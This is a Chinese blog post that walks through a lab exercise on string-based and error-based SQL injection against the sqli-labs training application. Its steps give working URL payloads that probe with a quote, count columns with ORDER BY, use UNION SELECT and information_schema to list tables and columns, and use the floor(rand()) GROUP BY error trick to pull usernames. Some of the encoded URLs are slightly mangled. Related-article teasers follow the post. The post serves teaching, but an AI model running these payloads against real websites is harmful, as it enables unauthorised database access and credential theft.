SQL注入字符型报错注入

最新推荐文章于 2024-06-01 15:00:55 发布
最新推荐文章于 2024-06-01 15:00:55 发布
阅读量495 收藏
点赞数
分类专栏: WEB安全 WEB漏洞 WEB应用入侵-SQL注入的类型 文章标签: SQL注入的类型
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/studyphp123/article/details/89026256
版权

一、预备知识

1. SQL注入基础知识
2. SQL语句基础知识

二、实验目的

学习SQL注入之字符型注入。

三、实验工具

火狐浏览器(hackbar插件)

四、实验环境

1. Windows Server 2003
2. 网址www.any.com/sqli/Less-1/?id=1

五、实验步骤

第一步:访问

http://www.any.com/sqli/Less-1/?id=1 #页面正常

在这里插入图片描述

第二步:加入单引号,访问

http://www.any.com/sqli/Less-1/?id=1' #会报错

在这里插入图片描述

第三步:判断列数。(通过二分法)

1)输入:

http://www.any.com/sqli/Less-1/?id=1' and 1=1

在这里插入图片描述

2)输入:

http://www.any.com/sqli/Less-1/?id=1' and 1=1 %23

在这里插入图片描述

3)输入:

http://www.any.com/sqli/Less-1/?id=1' and 1=2 %23

在这里插入图片描述

4)输入:

http://www.any.com/sqli/Less-1/?id=1%27%20order%20by%2010%23 #等价于 http://www.any.com/sqli/Less-1/?id=1' order by 10 %23

提示 Unknown column '10' in 'order clause',说明小于10列。

在这里插入图片描述

5)输入:

http://www.any.com/sqli/Less-1/?id=1%27%20order%20by205%23 #等价于 http://www.any.com/sqli/Less-1/?id=1' order by 5 %23

提示 Unknown column '5' in 'order clause',说明小于5列。

在这里插入图片描述

6)输入:

http://www.any.com/sqli/Less-1/?id=1%27%20order%20by203%23 #等价于 http://www.any.com/sqli/Less-1/?id=1 order by 3 %23

页面正常,说明大于等于3列。

在这里插入图片描述

7)输入:

http://www.any.com/sqli/Less-1/?id=1%27%20order%20by204%23 #等价于 http://www.any.com/sqli/Less-1/?id=1 order by 4 %23

提示 Unknown column '4' in 'order clause',说明小于4列,结合上面的可以确定有3列。

在这里插入图片描述

第四步:查看显错点

http://www.any.com/sqli/Less-1/?id=1' and 1=2 union select 11,22,33 %23

显错点在第二个和第三个位置。

在这里插入图片描述

第五步:查看用户信息、数据库名称、MySQL版本信息

http://www.any.com/sqli/Less-1/?id=1' and 1=2 union select 11,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),33 %23

在这里插入图片描述

第六步:查看 security 数据库中所有表

http://www.any.com/sqli/Less-1/?id=1' and 1=2 union select 1,2,unhex(hex(group_concat(table_name))) from information_schema.tables where table_schema='security' %23

得到所有的表:emailsreferersuagentsusers

在这里插入图片描述

第七步:查看 users 表中所有列

http://www.any.com/sqli/Less-2/?id=1 and 1=2 union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users' and table_schema='security' %23

得到所有的列:idusernamepassword

在这里插入图片描述

第八步:查看所有列的值

1)输入:

http://www.any.com/sqli/Less-5/?id=1' union select 1,count(*),concat((select username from security.users limit 0,1),0x3e,floor(rand()*2))a from information_schema.tables group by a%23

出现如下界面,表示输入的内容没有问题:

在这里插入图片描述

多次点击 Execute 按钮(或者直接刷新浏览器),会出现如下界面:

在这里插入图片描述

2)输入:

http://www.any.com/sqli/Less-5/?id=1' union select 1,count(*),concat((select username from security.users limit 1,1),0x3e,floor(rand()*2))a from information_schema.tables group by a%23

出现如下界面,表示输入的内容没有问题:

在这里插入图片描述

多次点击 Excute 按钮刷新(或者直接刷新浏览器),会出现如下界面:

在这里插入图片描述

studyphp123
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
SQL注入字符注入
qq_64332865的博客
02-17 644
访问sqli-labs网站 用火狐浏览器http://ip/sqli-Labs/Less-2/,登陆后先顶一个GET参数,再网址后边加上?id=1 显示用户名密码为Dumb 可以使用火狐浏览器带的hackbar工具,可以用来调整参数 寻找注入点 分别使用三条payload寻找注入点和判断注入类型 在原来的网址后加上?id=1’ 运行后报错 然后再换成?id=1 and 1=1 然后就运行正常 再把1=1换成1=2,再显示 结果没...
SQL 字符注入
MZa1213123的博客
03-02 4394
CTFHub SQL 字符注入 可以看到我们输入的数据会被单引号所括上 尝试正常的 1 and 1=2 发现没有报错 还是有回显 字符的 1 and 1=2 就相当于只是字符串 并没有发挥其表达式的作用所以这就没有产生错误回显 (不太明白为什么 sql 还是会查询到id = 1 的数据) 这时候我们添加 ' 手动闭合前一个 sql 语句然后再拼接上我们的 sql 语句进行测试 整个的 sql 语句大概是 $ sql = "select Data from table_name .
SQL Server 报错注入(一)
zzgslh的博客
12-25 3754
SQL Server报错注入 一、原理介绍 报错注入,顾名思义首先这里是有报错信息才可以,其次我们需要人为的制造一些错误,比如使用convert()函数进行类型转换时,如果转发失败就会报错,然后把我们要执行的SQL语句与convert()函数组合起来,报错的信息当中有咱们需要的信息。 二、函数介绍 – convert()函数介绍: convert(int,db_name()),含义是将第二个参数的值转换成第一个参数的int类型。利用mssql在转换类型的时候就出错,来爆数据库信息。 – quotename(
SQL Server注入之攻防技战法
自强不息
01-03 753
那天下着很大的雨,母亲从城里走回来的时候,浑身就是一个泥人,那一刻我就知道我没有别的选择了
SQL Server注入
最新发布
余十步的博客
06-01 604
原理:凡是在group by后面出现的字段,必须同时在select后面出现;凡是在select后面出现的、同时未在聚合函数中出现的字段,必须同时出现在group by后面。原理:试图将一个字符串与非字符串基本,或将一个字符串转换为另一个不兼容的类型时,那么SQL编辑器会抛出异常。不嵌入子查询:常用内置函数(conver或者case函数:将一种数据类型转换为另一种数据类型)也可以通过定义十六进制的SQL语句,使用exec函数执行。语句执行正常代表数据类型兼容,就可以将x换位SQL语句(如利用视图查询)
SQL Server手工注入方式
good good study
01-04 5676
本文详细的介绍了Sql Server安全基础,包括环境搭建,T-sql语法,sqlserver用户权限,以及sqlserver注入的方法和提权方式。 Microsoft SQL Server(微软结构化查询语言服务器),也叫Mssql,是由美国微软公司所推出的关系数据库。默认端口号为1433常见版本如下版本年份发布名称8.02000年8.02003年SQL Server 2000 64-bit版本9.02005年10.02008年10.252009年SQL Azure。
sql注入——报错注入
m0_73756016的博客
10-18 1683
报错注入是什么 什么是报错注入? 这是一种页面响应形式。响应过程如下: 用户在前台页面输入检索内容 后台将前台页面上输入的检索内容无加区别的拼接成sql语句,送给数据库执行。 数据库将执行的结果返回给后台,后台将数据库执行的结果无加区别的显示到前台页面上。 报错注入存在的基础:两个“无加区别”后台对于输入输出的合理性没有做检查 分类 1. 通过floor()报错注入 2.通过extractValue()报错注入 3.通过updateXml()报错注入 4.通过NAME_CONST()
【网络安全-SQL注入(4)】一篇文章带你了解sql server数据库三大权限,以及三大权限的SQL注入SQL注入点利用以及getshell_sqlsever数据库报错注入(1)
2401_84970415的博客
05-13 645
自我介绍一下,小编13年上海交大毕业,曾经在小公司待过,也去过华为、OPPO等大厂,18年进入阿里一直到现在。深知大多数网络安全工程师,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!因此收集整理了一份《2024年网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上网络安全知识点!真正的体系化!
SQL注入之基于布尔的盲注详解
09-10
布尔SQL注入是一种特殊的SQL注入方式,它发生在服务器对用户输入的数据进行响应时,并不会返回完整的数据库信息,而是仅返回“真”(True)或“假”(False)的反馈。这种方式使得攻击者需要根据系统对正确或错误...
SQL注入思路详解
12-14
2. **报错注入(Error Based)**:利用错误信息泄露数据库信息,如MySQL的`information_schema.tables`。 3. **布尔盲注(Boolean Based Blind)**:通过改变查询的布尔结果来判断数据的真假。 4. **时间盲注(Time ...
第四节 基于报错的SQL注入-01
09-15
字符SQL注入是指在SQL语句中使用字符串值作为输入参数,例如:`select * from table where id = '用户输入id'`。 GET基于报错的SQL注入发现 GET基于报错的SQL注入发现是指通过在URL中修改对应的ID值来探测URL中...
SQL字符注入漏洞.pdf
07-18
配套博客:https://blog.csdn.net/qq_41739364/article/details/94025729
关于sql注入的简要演示(入坑抛砖)
09-09
SQL注入是一种常见的网络安全漏洞,它发生在应用程序未能正确过滤或验证用户输入的数据时,允许攻击者插入恶意的SQL语句到应用程序的查询中。本文将通过一个简单的示例来解释SQL注入的工作原理和演示如何利用它。 ...
SQL 报错注入详解
2301_78008478的博客
05-08 908
近期学习 SQL 报错注入,本篇文章为关于报错注入的一些个人理解,如有错误,希望指出 本文使用 sqli-labs 数据库作为示例报错注入方式有很多,其中比较常见的有 floor() 、extractvalue() 、updatexml() 三种,本篇文章主要对这三种进行分析先贴上一个常见的 payload 再进行分析 (sqli-labs Less-5) 复制首先这个 payload 和网上很多的不太一样,查阅网上相关博客时发现大多数的 payload 都是这样写的 复制这个就是把发生报错的 se
SQL注入-基于MSsql(sql server)的注入
LJH1999ZN的博客
02-13 5309
目录 一、如何判断该网站使用的是sql server 数据库 二、sql server 数据库包含三张主要系统表 三、sql server 主要函数 四、数据库的注入流程 五、sql server 的联合查询 六、sql server 的报错注入 七、sql server 的布尔盲注。 一、如何判断该网站使用的是sql server 数据库 根据后缀判断:如果后缀为aspx,数据库大概是sql server 根据报错信息判断,报错信息中有Microsoft 字样。 根据系统表判断,a
【合天网安】SQLi-Labs系列之字符报错注入
hehigoxqc606的博客
09-01 205
SQL注入介绍: SQLi,sql injection, 我们称之为sql注入。何为sql,英文:Structured Query Language,叫做结构化查询语言。常见的结构化数据库有MySQL,MS SQL,Oracle以及Postgresql.Sql语言就是我们在管理数据库时用到的一种。在我们的应用系统使用sql语句进行管理应用数据库时,往往采用拼接的方式形成一条完整的数据库语言,而危险的时,在拼接sql语句的时候,我们可以改变sql语句。从而让数据执行我们想要执行的语句,这就是我们常...
东塔学院(sql注入字符注入,报错注入,JSON,文件读取、写入 )
m0_55563900的博客
03-30 1013
什么是sql注入 SQL注入是服务器端未严格校验客户端发送的数据,而导致服务端SQL语句被恶意修改并成功执行的行为 称为SQL注入。 代码对带入SQL语句的参数过滤不严格 未启用框架的安全配置,例如: PHP的magic. quotes. _gpc 未使用框架安全的查询方法 测试接未删除 未启用防火墙 未使用其他的安全防护设备 字符注入类型1 打开页面,叫我们输入ID作为带数值的参数 Mysql查询经常用到的语句 查库:select schema_name from information_schem
SQL注入系列篇 | 报错注入
d59hao的博客
05-05 919
报错注入是通过构造恶意SQL,使数据库报错,从报错信息中得到敏感信息的方法。如果服务器应用没有对这种错误进行处理,则攻击者可以通过页面的错误回显获取数据。
SQL注入-报错注入
LJH1999ZN的博客
02-09 9995
sql注入报错注入的演示与介绍
sql注入教程:报错注入与二阶攻击策略
本篇自学笔记详细探讨了SQL注入中的一个重要技术手段——报错注入报错注入利用的是Web应用程序中未关闭或过滤错误处理功能的情况,攻击者通过构造恶意SQL语句,迫使服务器在执行时返回错误信息,从而间接获取敏感...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值